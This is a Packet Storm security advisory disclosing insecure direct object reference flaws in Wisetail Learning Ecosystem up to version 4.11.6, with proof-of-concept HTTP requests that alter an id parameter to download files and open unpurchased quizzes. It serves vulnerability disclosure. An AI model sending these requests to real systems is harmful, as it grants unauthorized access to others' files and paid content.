Wisetail Learning Ecosystem 4.11.6 Insecure Direct Object Reference

2018-09-13T00:00:00
ID PACKETSTORM:149356
Type packetstorm
Reporter S. M. Zia Ur Rashid
Modified 2018-09-13T00:00:00

Description

                                        
                                            `Title: MULTIPLE IDOR VUNLERABILITies ON WISETAIL LEARNING ECOSYSTEM (LE)  
UPTO V4.11.6  
  
  
  
*D**ate:* 12/09/2019  
  
*A**uthor:* S. M. Zia Ur Rashid  
  
*Vendor Homepage:* wisetail.com  
  
*Author Contact: *https://www.linkedin.com/in/ziaurrashid/  
  
*Affected Version:* <= 4.11.6  
  
*Assaigned CVE: *CVE-2018-16970, CVE-2018-16971  
  
  
  
*Description:* Wisetail Learning Ecosystem (LE) upto v4.11.6 suffers from  
multiple insecure direct object reference (IDOR) vulnerability that allows  
to download files and access to the non-purchased course quiz test via a  
modified id parameter.  
  
  
  
*Proof-of-Concep (POC):*  
  
  
*// File Disclosure*  
  
  
  
GET /eco_download.php?id=2639 HTTP/1.1  
  
Host: xxxxxxx  
  
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:63.0) Gecko/20100101  
Firefox/63.0  
  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
  
Accept-Language: en-US,en;q=0.5  
  
Accept-Encoding: gzip, deflate  
  
DNT: 1  
  
Connection: close  
  
Cookie: xxxxxxxxxxxxxx  
  
Upgrade-Insecure-Requests: 1  
  
  
  
*// Access Quiz Test*  
  
  
  
GET /eco_test.php?id=29 HTTP/1.1  
  
Host: xxxxxxx  
  
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:63.0) Gecko/20100101  
Firefox/63.0  
  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
  
Accept-Language: en-US,en;q=0.5  
  
Accept-Encoding: gzip, deflate  
  
DNT: 1  
  
Connection: close  
  
Cookie: xxxxxxx  
  
Upgrade-Insecure-Requests: 1  
  
  
  
*Video POC:* https://youtu.be/l3msLYdI3fI  
  
  
  
*References:*  
  
https://blog.ziaurrashid.com/wisetail-learning-ecosystem-multiple-idor-vunlerability/  
  
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16970  
  
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16971  
  
  
*Regards,*  
*S M Zia Ur Rashid*  
Student, Dept. of EEE, International Islamic University Chittagong  
Student Ambassador, IEEEmadC  
Public Relation Ambassador, IEEEXtreme Programming Competition 12.0  
Webmaster, IEEE Bangladesh Section Student Activities Committee 2018  
Webmaster, IEEE IIUC Student Branch (2018)  
Contact: E-mail <smziaurrashid@gmail.com> *|* Web <https://ziaurrashid.com/>  
  
Connect: Facebook <https://www.facebook.com/smziaurrashid.info> *|* LinkedIn  
<https://www.linkedin.com/in/ziaurrashid>  
`